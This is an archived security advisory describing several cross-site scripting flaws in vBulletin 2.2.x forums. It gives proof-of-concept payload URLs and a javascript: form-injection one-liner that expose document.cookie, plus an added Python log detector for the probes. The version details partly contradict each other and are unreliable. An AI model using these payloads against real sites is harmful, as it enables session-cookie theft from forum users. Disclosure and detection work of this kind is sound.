vBulletin Multiple Cross Site Scripting Vulnerabilities

2003-09-19T00:00:00
ID SECURITYVULNS:DOC:5131
Type securityvulns
Reporter Securityvulns
Modified 2003-09-19T00:00:00

Description

SYSTEMS AFFECTED ========

Jelsoft Enterprises vBulletin Forum

(exploited with a browser)

CONTENTS =========

Subject: vBulletin Multiple Cross Site Scripting Vulnerabilities

Date: 17 September 2003 (release from old archive, flaws found on 7 September 2002)

Risk: Low

DESCRIPTION =========

The vBulletin Forum can be forced to return attacker-controlled content to a user's browser.

There are multiple cross-site scripting vulnerabilities (abbreviated "CSS" in this advisory) in version 3.0 and prior; the versions affected by each issue are given below.

DETAILS =========

1) The first bug affects vBulletin versions 2.2.7 and 2.2.6, and probably earlier versions.

The "aim" parameter is not filtered before it is written into the page, so script injection is possible:

www.host.com/forum/member.php?s=&action=aimmessage&aim=<script>alert(document.cookie)</script>

2) The second one is more difficult to exploit and affects only 2.2.6 (or earlier).

Private-message folder names are stored and later rendered without filtering, so a folder name can carry script. Version 2.2.7 appears to fix this flaw.

Type the following into the browser's address bar as a single line. It writes a form that POSTs to private.php with action "doeditfolders", submitting a folder name (folderlist[2]) that contains script; the "s" session parameter is left empty:

javascript:document.write('<form name="form1" action="http://www.host.com/forum/private.php" method="post"><input type="hidden" name="s" value=""><input type="hidden" name="highest" value="3"><input type="hidden" name="folderlist[2]" value="<script>alert(document.cookie)</script>"><input type="hidden" name="folderlist[3]" value=""><input type="hidden" name="folderlist[4]" value=""><input type="hidden" name="action" value="doeditfolders"><input type="submit" name="submit" value="write to me"></form>');

3) The third bug is exploited through the "membername" parameter of the Quickfind form.

Tested on 2.2.6 with Quickfind enabled (Quickfind is an add-on "hack", not part of the stock forum).

4) CSS in Lost Password form:

www.host.com/forum/member.php?s=&action=lostpw&url="><script>alert(document.cookie)</script>

5) CSS in showthread, word highlight function:

www.host.com/forum/showthread.php?s=&threadid=xxxx&highlight="><script>alert(document.cookie)</script>

6) CSS on 2.2.9 and prior. Enter this into the address bar while viewing a forum index page:

javascript:who(document.cookie)
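The URLs above double as log signatures. As an added example (not part of the original advisory and not vBulletin code), the following Python detector scans Apache combined-format access log lines for the GET-based probes from issues 1, 3, 4 and 5. The log lines are constructed; the script-to-parameter mapping follows the URLs above; treating "membername" as watched on every script is an assumption, since the advisory does not name the script the Quickfind form submits to. Issue 2 travels in a POST body and the javascript: URL of issue 6 never leaves the browser, so neither can appear in an access log.

```python
"""Detect the reflected-XSS probes from this advisory in Apache access logs.

Added example, stdlib only. Covers issues 1, 3, 4 and 5 (GET parameters
"aim", "url", "highlight" and "membername"). Percent-encoding is undone
in several rounds because a probe may be double-encoded (%253C -> %3C -> <).
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Script -> parameters the advisory names as unfiltered.
WATCHED = {
    "member.php": {"aim", "url"},
    "showthread.php": {"highlight"},
}
# Assumption: the advisory does not say which script receives the Quickfind
# "membername" parameter, so it is checked on every script.
ANY_SCRIPT = {"membername"}

# Apache combined format: ip ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters and tokens that have no place in a screen name, URL or search
# term and that the advisory's payloads rely on (tag/attribute breakout).
XSS_MARKERS = re.compile(r'[<>"]|javascript:|\bon\w+\s*=', re.IGNORECASE)


def decode(value: str, rounds: int = 2) -> str:
    """Undo up to `rounds` further layers of percent-encoding."""
    for _ in range(rounds):
        new = unquote_plus(value)
        if new == value:
            break
        value = new
    return value


def find_xss_probes(line: str):
    """Return (ip, script, parameter, decoded value) for each suspicious value."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    script = parts.path.rsplit("/", 1)[-1]
    watched = WATCHED.get(script, set()) | ANY_SCRIPT
    hits = []
    # parse_qs already percent-decodes once; keep empty values such as "s=".
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in watched:
            continue
        for raw in values:
            value = decode(raw)
            if XSS_MARKERS.search(value):
                hits.append((m.group("ip"), script, name, value))
    return hits


def scan(log_text: str):
    """Run the detector over every line of a log and collect the hits in order."""
    findings = []
    for line in log_text.splitlines():
        findings.extend(find_xss_probes(line))
    return findings


# Constructed sample log: probes for issues 1, 5 and 4 (the last one
# double-encoded), plus two benign requests.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Sep/2003:10:01:12 +0200] "GET /forum/member.php?s=&action=aimmessage&aim=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
203.0.113.5 - - [19/Sep/2003:10:01:40 +0200] "GET /forum/showthread.php?s=&threadid=1234&highlight=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 8812 "-" "Mozilla/4.0"
198.51.100.7 - - [19/Sep/2003:10:02:03 +0200] "GET /forum/showthread.php?s=&threadid=1234&highlight=vbulletin HTTP/1.1" 200 8812 "-" "Mozilla/4.0"
203.0.113.5 - - [19/Sep/2003:10:02:30 +0200] "GET /forum/member.php?s=&action=lostpw&url=%2522%253E%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 3301 "-" "Mozilla/4.0"
198.51.100.9 - - [19/Sep/2003:10:03:00 +0200] "GET /forum/index.php?s= HTTP/1.1" 200 14000 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    for ip, script, param, value in scan(SAMPLE_LOG):
        print(f"{ip} {script} param={param!r} value={value!r}")
```

The marker set is deliberately narrow (angle brackets, a double quote, a javascript: scheme, an on*= handler) so that ordinary screen names and search terms in "highlight" do not alert; a value that breaks out of an attribute, as the lostpw and highlight payloads do with `">`, is caught by the quote alone even when the tag name is obfuscated.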

RISKS ==========

Theft of cookies, which may contain sensitive data (personal information, passwords, etc.).

WORKAROUNDS ========

Upgrade to a fixed release (2.2.8 or later; see the vendor status below).

VENDOR STATUS ========

vBulletin programmers were notified on 7 September 2002.

All of the flaws are patched from version 2.2.8 onwards (and in the 3.0 beta).

DISCLAIMER ========

This information is supplied for educational purposes only.

The author is not liable for the direct or indirect use of this

information, which must not be used to modify or interrupt the operation

of computer systems.

LEGAL NOTICE ========

This advisory is Copyright (c) 2003 Roberto Dapino.

It may be reproduced without the author's written permission

only if unmodified.

CREDITS =========

Vulnerabilities found by Roberto Dapino, Italy. - roberto@xdesign.it

Special thanks to: vBulletin Programmers.

xdesign.it - stormvision.it
